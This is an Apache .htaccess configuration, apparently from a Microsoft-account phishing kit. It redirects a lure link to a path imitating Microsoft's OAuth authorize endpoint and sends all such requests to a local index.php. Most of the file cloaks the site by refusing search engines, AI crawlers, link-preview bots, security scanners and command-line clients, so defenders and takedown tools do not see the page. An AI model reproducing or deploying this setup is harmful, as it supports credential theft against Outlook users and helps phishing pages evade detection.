# .htaccess - Complete working version

RewriteEngine On

# Redirect https://yourdomain.com/?ai=xd to full OAuth URL
RewriteCond %{QUERY_STRING} ^ai=([^&]+)$ [NC]
RewriteCond %{REQUEST_URI} ^/$
RewriteRule ^$ /oauth2/v2.0/authorize?client_id=9199bf20-a13f-4107-85dc-02114787ef48&scope=https%3A%2F%2Foutlook.office.com%2F.default%20openid%20profile%20offline_access&redirect_uri=https%3A%2F%2Foutlook.office.com%2Fmail%2F&response_type=code&response_mode=query&prompt=select_account&ai=%1 [R=302,L]

# Handle the OAuth URL and rewrite to index.php
RewriteCond %{REQUEST_URI} ^/oauth2/v2.0/authorize [NC]
RewriteRule ^.*$ index.php [QSA,L]

# Fallback for any OAuth-like paths
RewriteCond %{REQUEST_URI} ^/(common|organizations|consumers)/oauth2/v2.0/authorize [NC]
RewriteRule ^.*$ index.php [QSA,L]

# Block known bad bots
RewriteCond %{HTTP_USER_AGENT} (Googlebot|bingbot|AhrefsBot|SemrushBot|GPTBot|ChatGPT-User|anthropic-ai|ClaudeBot|facebot|facebookexternalhit|Twitterbot|WhatsApp|TelegramBot) [NC]
RewriteRule .* - [F,L]

# Block security scanners
RewriteCond %{HTTP_USER_AGENT} (sqlmap|nikto|nessus|burp|zap|wpscan|nmap|masscan|curl|wget|python-requests) [NC]
RewriteRule .* - [F,L]

# Block empty user agents
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule .* - [F,L]

# Block requests with no accept header
RewriteCond %{HTTP_ACCEPT} ^$
RewriteRule .* - [F,L]

# Security headers
Header set X-Content-Type-Options "nosniff"
Header set X-Frame-Options "DENY"
Header set X-XSS-Protection "1; mode=block"
Header set Referrer-Policy "no-referrer-when-downgrade"

# Disable directory listing
Options -Indexes

# Protect sensitive files
<FilesMatch "\.(ini|log|sql|bak|config|yml|json|txt)$">
    Order Allow,Deny
    Deny from all
</FilesMatch>

# Block access to logs directory
RedirectMatch 403 ^/logs/.*$